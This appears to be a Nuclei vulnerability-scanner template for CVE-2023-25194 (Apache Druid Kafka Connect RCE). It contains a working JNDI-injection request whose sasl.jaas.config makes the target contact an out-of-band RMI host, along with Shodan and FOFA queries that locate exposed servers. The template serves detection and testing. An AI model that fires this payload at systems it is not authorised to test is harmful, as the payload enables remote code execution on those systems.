id: CVE-2023-25194 info: name: Apache Druid Kafka Connect - Remote Code Execution author: j4vaovo severity: high description: | The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html - https://kafka.apache.org/cve-list classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 epss-score: 0.96717 epss-percentile: 0.99653 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: kafka_connect shodan-query: html:"Apache Druid" fofa-query: body="apache druid" tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast http: - raw: - | POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "type":"kafka", "spec":{ "type":"kafka", "ioConfig":{ "type":"kafka", "consumerProperties":{ "bootstrap.servers":"127.0.0.1:6666", "sasl.mechanism":"SCRAM-SHA-256", "security.protocol":"SASL_SSL", "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" }, "topic":"test", "useEarliestOffset":true, "inputFormat":{ "type":"regex", "pattern":"([\\s\\S]*)", "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", "columns":[ "raw" ] } }, "dataSchema":{ "dataSource":"sample", "timestampSpec":{ "column":"!!!_no_such_column_!!!", "missingValue":"1970-01-01T00:00:00Z" }, "dimensionsSpec":{ }, "granularitySpec":{ "rollup":false } }, "tuningConfig":{ "type":"kafka" } }, "samplerConfig":{ "numRows":500, "timeoutMs":15000 } } matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - 'RecordSupplier' - type: status status: - 400 # digest: 4a0a0047304502203e73ac9fdf5b0743ff5219b36631bae363aa2c377bcb325db674d83289fa2f5c022100ad756a8663c7df0962fece18df6230af5d78c6bb80beb1e3e0fdbc3e7ee4d25e:922c64590222798bb761d5b6d8e72950